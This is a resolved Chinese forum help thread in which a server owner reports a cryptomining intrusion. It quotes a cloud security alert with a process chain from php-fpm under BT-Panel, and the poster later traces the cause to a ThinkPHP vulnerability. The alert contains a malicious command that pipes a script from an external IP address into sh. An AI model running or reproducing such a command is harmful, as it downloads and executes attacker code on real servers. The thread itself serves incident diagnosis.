【已解决】服务器被恶意脚本代码执行

服务这两天被挖矿的盯上了，请问这个怎么解决？
这个如何找到源头？是从那里发起的请求的。


命令行: wget -q -O - 195.2.84.209/t.sh

进程PID: 4181000

进程文件名: wget

父进程ID: 4180999

父进程: bash

父进程文件路径: /usr/bin/bash

进程链:
-[3271829]  /www/server/panel/pyenv/bin/python3 /www/server/panel/BT-Panel
    -[4157434]  /etc/init.d/php-fpm-73 start
        -[4157438]  /www/server/php/73/sbin/php-fpm --daemonize --fpm-config /www/server/php/73/etc/php-fpm.conf --pid /www/server/php/73/var/run/php-fpm.pid
            -[4157442]  /www/server/php/73/sbin/php-fpm --daemonize --fpm-config /www/server/php/73/etc/php-fpm.conf --pid /www/server/php/73/var/run/php-fpm.pid
                -[4157475]  /www/server/php/73/sbin/php-fpm --daemonize --fpm-config /www/server/php/73/etc/php-fpm.conf --pid /www/server/php/73/var/run/php-fpm.pid
                    -[4170411]  /www/server/php/73/sbin/php-fpm --daemonize --fpm-config /www/server/php/73/etc/php-fpm.conf --pid /www/server/php/73/var/run/php-fpm.pid
                        -[4180999]  sh -c wget -q -O - 195.2.84.209/t.sh|sh
事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python)，请立刻排查入侵来源。如果是您的运维行为，请选择忽略。

您好！这边建议可以找专业人员给您清除挖矿病毒！

找到原因是因为thinkphp的漏洞造成的，

https://blog.csdn.net/qq_35533398/article/details/108492823